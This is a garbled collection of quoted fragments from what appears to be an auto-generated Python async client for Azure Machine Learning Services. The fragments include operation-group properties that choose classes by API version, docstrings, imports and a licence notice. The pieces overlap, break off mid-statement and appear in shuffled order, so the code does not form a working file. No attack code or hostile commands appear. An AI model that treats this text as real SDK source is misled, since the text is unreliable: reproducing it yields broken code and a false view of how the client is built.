2021-10-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelContainersOperations>` * 2022-02-01-preview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelContainersOperations>` *", "version {} does not have operation group 'registry_management_non_workspace'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "does not have operation group 'code_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "API version: * 2021-10-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatastoresOperations>` * 2022-02-01-preview: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DatastoresOperations>` * 2022-05-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DatastoresOperations>` \"\"\" api_version", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentContainersOperations>` *", "{k: v for k, v in cls.models(api_version).__dict__.items() if isinstance(v, type)} @classmethod def models(cls,", "operation group 'virtual_machine_sizes'\".format(api_version)) return OperationClass(self._client, self._config, 
Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_connections(self): \"\"\"Instance depends", "'run_artifacts': 'v1.0', 'runs': 'v1.0', 'spans': 'v1.0', 'temporary_data_references': '2021-10-01-dataplanepreview', }}, _PROFILE_TAG + \" latest\"", "needed for the client to connect to Azure. :type credential: ~azure.core.credentials_async.AsyncTokenCredential :param subscription_id:", "version: * 1.0.0: :class:`ModelsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ModelsOperations>` \"\"\" api_version = self._get_api_version('models') if api_version == '1.0.0': from", "..v2022_05_01.aio.operations import JobsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "api_version = self._get_api_version('events') if api_version == 'v1.0': from ..runhistory.aio.operations import EventsOperations as OperationClass", "@property def batch_job_endpoint(self): \"\"\"Instance depends on the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobEndpointOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobEndpointOperations>` \"\"\"", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'models'\".format(api_version)) return", "version {} does not have operation group 'batch_endpoints'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "DataVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "does not have operation group 'batch_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "ValueError(\"API version {} does not have operation group 'datasets_v1'\".format(api_version)) 
return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "* 2022-05-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspacesOperations>` \"\"\" api_version = self._get_api_version('workspaces') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "import DeleteOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "def batch_deployments(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchDeploymentsOperations>` * 2022-02-01-preview:", "from ..v2021_10_01_dataplanepreview.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "else: raise ValueError(\"API version {} does not have operation group 'models'\".format(api_version)) return OperationClass(self._client,", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def runs(self): \"\"\"Instance depends on the API version:", "Deserializer(self._models_dict(api_version))) @property def batch_deployments(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchDeploymentsOperations>`", "..v2021_10_01.aio.operations import DatasetContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have", "2021-10-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentVersionsOperations>` * 2022-02-01-preview: 
:class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentVersionsOperations>` * 2022-05-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentVersionsOperations>` \"\"\" api_version", "operation group 'dataset_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_controller_v2(self): \"\"\"Instance depends", "lost if the code is # regenerated. # -------------------------------------------------------------------------- from typing import Any,", "== '2022-05-01': from ..v2022_05_01.aio.operations import Operations as OperationClass else: raise ValueError(\"API version {}", "'models': '1.0.0', 'registry_management_non_workspace': 'v1.0', 'run': 'v1.0', 'run_artifacts': 'v1.0', 'runs': 'v1.0', 'spans': 'v1.0', 'temporary_data_references':", "Deserializer(self._models_dict(api_version))) @property def online_deployments(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineDeploymentsOperations>`", "does not have operation group 'quotas'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_container(self): \"\"\"Instance depends on the API version: *", "as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import Operations as OperationClass elif", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def 
operations(self): \"\"\"Instance depends on the API version:", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.UsagesOperations>` * 2022-01-01-preview: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.UsagesOperations>` *", "* v1.0: :class:`RunOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunOperations>` \"\"\" api_version = self._get_api_version('run') if api_version == 'v1.0': from ..runhistory.aio.operations", "def experiments(self): \"\"\"Instance depends on the API version: * v1.0: :class:`ExperimentsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.ExperimentsOperations>` \"\"\" api_version", "self._get_api_version('model_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ModelVersionsOperations as OperationClass elif api_version", "DatasetsV1Operations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "..v2022_05_01.aio.operations import ComputeOperations as OperationClass else: raise ValueError(\"API version {} does not have", "elif api_version == '1.0.0': from ..model_dataplane import models return models elif api_version ==", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatasetVersionsOperations as OperationClass else: raise ValueError(\"API", "depends on the API version: * v1.0: :class:`SpansOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.SpansOperations>` \"\"\" api_version = self._get_api_version('spans') if", "DeleteOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "API version: * v1.0: :class:`MetricOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.MetricOperations>` \"\"\" api_version = self._get_api_version('metric') if api_version == 'v1.0':", "import 
WorkspacesOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "2021-10-01-dataplanepreview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelVersionsOperations>` * 2022-02-01-preview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelVersionsOperations>` * 2022-05-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelVersionsOperations>` \"\"\" api_version = self._get_api_version('model_versions') if", "'runs': 'v1.0', 'spans': 'v1.0', 'temporary_data_references': '2021-10-01-dataplanepreview', }}, _PROFILE_TAG + \" latest\" ) def", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def async_operations(self): \"\"\"Instance depends on the API version: * v1.0:", "version: * 1.5.0: :class:`DatasetControllerV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetControllerV2Operations>` \"\"\" api_version = self._get_api_version('dataset_controller_v2') if api_version == '1.5.0': from", "from ..v2021_10_01.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import", "Deserializer(self._models_dict(api_version))) @property def models(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`ModelsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ModelsOperations>`", ":mod:`dataset_dataplane.models<azure.mgmt.machinelearningservices.dataset_dataplane.models>` * 1.0.0: :mod:`model_dataplane.models<azure.mgmt.machinelearningservices.model_dataplane.models>` * v1.0: :mod:`registry_discovery.models<azure.mgmt.machinelearningservices.registry_discovery.models>` * v1.0: 
:mod:`runhistory.models<azure.mgmt.machinelearningservices.runhistory.models>` * 2020-09-01-dataplanepreview: :mod:`v2020_09_01_dataplanepreview.models<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.models>`", "ComponentContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentContainersOperations as OperationClass", "ValueError(\"API version {} does not have operation group 'virtual_machine_sizes'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "self._get_api_version('run') if api_version == 'v1.0': from ..runhistory.aio.operations import RunOperations as OperationClass else: raise", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DatastoresOperations as OperationClass else: raise ValueError(\"API", ":class:`DatasetContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetContainersOperations>` \"\"\" api_version = self._get_api_version('dataset_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatasetContainersOperations", "operation group 'async_operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_deployments(self): \"\"\"Instance depends", ":class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentVersionsOperations>` * 2022-02-01-preview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentVersionsOperations>` * 2022-05-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentVersionsOperations>` \"\"\" api_version = self._get_api_version('environment_versions') if 
api_version", "* 2021-10-01: :class:`Operations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.Operations>` * 2022-01-01-preview: :class:`Operations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.Operations>` * 2022-05-01: :class:`Operations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.Operations>` \"\"\" api_version = self._get_api_version('operations')", "from ..v2021_10_01.aio.operations import BatchEndpointsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "{} does not have operation group 'workspace_features'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "import AssetsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "import models return models elif api_version == '1.0.0': from ..model_dataplane import models return", "import OnlineDeploymentsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineDeploymentsOperations as", ":class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeContainersOperations>` \"\"\" api_version = self._get_api_version('code_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import CodeContainersOperations", "import Deserializer, Serializer from ._configuration import AzureMachineLearningWorkspacesConfiguration if TYPE_CHECKING: # pylint: disable=unused-import,ungrouped-imports from", ":class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentVersionsOperations>` \"\"\" api_version = self._get_api_version('component_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComponentVersionsOperations", "does not have operation 
group 'private_endpoint_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "does not have operation group 'workspace_features'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "def workspaces(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspacesOperations>` * 2022-01-01-preview:", "'2021-10-01': from ..v2021_10_01.aio.operations import VirtualMachineSizesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations", "api_version = self._get_api_version('data_versions') if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataVersionsOperations as OperationClass", "\"\"\" api_version = self._get_api_version('metric') if api_version == 'v1.0': from ..runhistory.aio.operations import MetricOperations as", "profile is provided, or if missing in profile. 
:type api_version: str :param base_url:", "models elif api_version == '1.0.0': from ..model_dataplane import models return models elif api_version", ":class:`AssetsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.AssetsOperations>` \"\"\" api_version = self._get_api_version('assets') if api_version == '1.0.0': from ..model_dataplane.aio.operations import AssetsOperations", "= \"https://management.azure.com\", profile: KnownProfiles = KnownProfiles.default, **kwargs # type: Any ) -> None:", "as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelContainersOperations as OperationClass elif", "'v1.0': from ..runhistory.aio.operations import ExperimentsOperations as OperationClass else: raise ValueError(\"API version {} does", "group 'usages'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def virtual_machine_sizes(self): \"\"\"Instance depends on", "'workspaces'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) async def close(self): await self._client.close() async def", ":param credential: Credential needed for the client to connect to Azure. 
:type credential:", "\"\"\"Instance depends on the API version: * 2020-09-01-dataplanepreview: :class:`BatchJobDeploymentOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobDeploymentOperations>` \"\"\" api_version = self._get_api_version('batch_job_deployment')", "@property def quotas(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.QuotasOperations>` *", "self._get_api_version('batch_deployments') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import BatchDeploymentsOperations as OperationClass elif api_version", "operation group and its API version. The api-version parameter sets the default API", "group 'online_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_endpoints(self): \"\"\"Instance depends on", "ValueError(\"API version {} does not have operation group 'assets'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "group 'environment_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_versions(self): \"\"\"Instance depends on", "{} does not have operation group 'events'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "1.5.0: :class:`DatasetControllerV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetControllerV2Operations>` \"\"\" api_version = self._get_api_version('dataset_controller_v2') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import", "have 
operation group 'data_container'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_containers(self): \"\"\"Instance", "== '1.5.0': from ..dataset_dataplane.aio.operations import DataCallOperations as OperationClass else: raise ValueError(\"API version {}", "2022-05-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.UsagesOperations>` \"\"\" api_version = self._get_api_version('usages') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "from ..v2022_01_01_preview.aio.operations import WorkspacesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "not have operation group 'jobs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def metric(self):", "group 'delete'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_containers(self): \"\"\"Instance depends on", "else: raise ValueError(\"API version {} does not have operation group 'code_containers'\".format(api_version)) return OperationClass(self._client,", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datastores(self): \"\"\"Instance depends on the API version: *", "azure.profiles import KnownProfiles, ProfileDefinition from azure.profiles.multiapiclient import MultiApiClientMixin from msrest import Deserializer, Serializer", "from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "on the API version: 
* 2021-10-01-dataplanepreview: :class:`TemporaryDataReferencesOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.TemporaryDataReferencesOperations>` \"\"\" api_version = self._get_api_version('temporary_data_references') if api_version", "virtual_machine_sizes(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.VirtualMachineSizesOperations>` * 2022-01-01-preview: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.VirtualMachineSizesOperations>`", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def registry_management_non_workspace(self): \"\"\"Instance depends on the API", "api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataContainerOperations as OperationClass else: raise ValueError(\"API version", "== '2021-10-01': from ..v2021_10_01.aio.operations import ComputeOperations as OperationClass elif api_version == '2022-01-01-preview': from", "else: raise ValueError(\"API version {} does not have operation group 'private_link_resources'\".format(api_version)) return OperationClass(self._client,", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "version: * 2021-10-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentVersionsOperations>` * 2022-02-01-preview: 
:class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentVersionsOperations>` * 2022-05-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentVersionsOperations>`", "code_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeContainersOperations>` * 2021-10-01-dataplanepreview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeContainersOperations>`", "'2021-10-01-dataplanepreview', }}, _PROFILE_TAG + \" latest\" ) def __init__( self, credential: \"AsyncTokenCredential\", subscription_id:", "on the API version: * 1.0.0: :class:`ModelsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ModelsOperations>` \"\"\" api_version = self._get_api_version('models') if api_version", "2022-05-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.QuotasOperations>` \"\"\" api_version = self._get_api_version('quotas') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "api_version == '1.5.0': from ..dataset_dataplane.aio.operations import GetOperationStatusOperations as OperationClass else: raise ValueError(\"API version", "== '1.0.0': from ..model_dataplane.aio.operations import ExtensiveModelOperations as OperationClass else: raise ValueError(\"API version {}", "_SDKClient): \"\"\"These APIs allow end users to operate on Azure Machine Learning Workspace", "'2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateLinkResourcesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "etc.). 
By default, it uses the latest API version available on public Azure.", "have operation group 'batch_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_endpoints(self): \"\"\"Instance", "This ready contains multiple API versions, to help you deal with all of", "on the API version: * 1.5.0: :class:`DatasetControllerV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetControllerV2Operations>` \"\"\" api_version = self._get_api_version('dataset_controller_v2') if api_version", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceFeaturesOperations as OperationClass else: raise ValueError(\"API version", "* 2021-10-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentVersionsOperations>` * 2022-02-01-preview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentVersionsOperations>` * 2022-05-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentVersionsOperations>` \"\"\"", "== '2021-10-01': from ..v2021_10_01.aio.operations import JobsOperations as OperationClass elif api_version == '2022-02-01-preview': from", "* 2022-05-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.QuotasOperations>` \"\"\" api_version = self._get_api_version('quotas') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_containers(self): \"\"\"Instance depends on the 
API version: * 2021-10-01:", "from ..v2022_02_01_preview.aio.operations import DataVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "{} does not have operation group 'run_artifacts'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'events'\".format(api_version)) return", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def experiments(self): \"\"\"Instance depends on the API", "..v2021_10_01_dataplanepreview import models return models elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview import models", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def metric(self): \"\"\"Instance depends on the API version: * v1.0:", "TYPE_CHECKING from azure.mgmt.core import AsyncARMPipelineClient from azure.profiles import KnownProfiles, ProfileDefinition from azure.profiles.multiapiclient import", "'v1.0': from ..runhistory.aio.operations import EventsOperations as OperationClass else: raise ValueError(\"API version {} does", "ValueError(\"API version {} does not have operation group 'datastores'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "does not have operation group 'extensive_model'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "will be lost if the code is # regenerated. 
# -------------------------------------------------------------------------- from typing", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datasets_v1(self): \"\"\"Instance depends on the API", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'virtual_machine_sizes'\".format(api_version)) return", "the latest API version available on public Azure. For production, you should stick", "self._get_api_version('online_endpoints') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import OnlineEndpointsOperations as OperationClass elif api_version", "== '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import TemporaryDataReferencesOperations as OperationClass else: raise ValueError(\"API version {}", "operations(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`Operations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.Operations>` * 2022-01-01-preview: :class:`Operations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.Operations>`", "depends on the API version: * v1.0: :class:`RunArtifactsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunArtifactsOperations>` \"\"\" api_version = self._get_api_version('run_artifacts') if", "\"\"\" api_version = self._get_api_version('migration') if api_version == '1.0.0': from ..model_dataplane.aio.operations import MigrationOperations as", "the API version: * 1.5.0: :class:`GetOperationStatusOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.GetOperationStatusOperations>` \"\"\" api_version = self._get_api_version('get_operation_status') if api_version ==", "operation group 'data_call'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), 
Deserializer(self._models_dict(api_version))) @property def data_container(self): \"\"\"Instance depends", "CodeVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeVersionsOperations as OperationClass", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "(Azure Stack, Azure Government, Azure China, etc.). By default, it uses the latest", "'assets'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def async_operations(self): \"\"\"Instance depends on the", "Deserializer(self._models_dict(api_version))) @property def data_version(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DataVersionOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataVersionOperations>`", "api_version = self._get_api_version('temporary_data_references') if api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import TemporaryDataReferencesOperations as OperationClass", "..v2022_05_01.aio.operations import CodeVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "import ComputeOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import ComputeOperations as", "Optional, TYPE_CHECKING from azure.mgmt.core import AsyncARMPipelineClient from azure.profiles import KnownProfiles, ProfileDefinition from azure.profiles.multiapiclient", "on the API version: * 1.5.0: :class:`DataCallOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataCallOperations>` \"\"\" api_version = self._get_api_version('data_call') if api_version", "== 
'1.5.0': from ..dataset_dataplane.aio.operations import DeleteOperations as OperationClass elif api_version == 'v1.0': from", "if no Retry-After header is present. \"\"\" DEFAULT_API_VERSION = '2022-05-01' _PROFILE_TAG = \"azure.mgmt.machinelearningservices.AzureMachineLearningWorkspaces\"", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def experiments(self): \"\"\"Instance depends on the API version: *", "api_version == 'v1.0': from ..registry_discovery.aio.operations import AsyncOperationsOperations as OperationClass else: raise ValueError(\"API version", "OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeContainersOperations as OperationClass elif api_version", "v1.0: :class:`RunOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunOperations>` \"\"\" api_version = self._get_api_version('run') if api_version == 'v1.0': from ..runhistory.aio.operations import", "\"\"\" api_version = self._get_api_version('workspace_features') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspaceFeaturesOperations as", "'2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import JobsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "Deserializer(self._models_dict(api_version))) @property def runs(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RunsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunsOperations>`", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspacesOperations as OperationClass else:", "Licensed under the MIT 
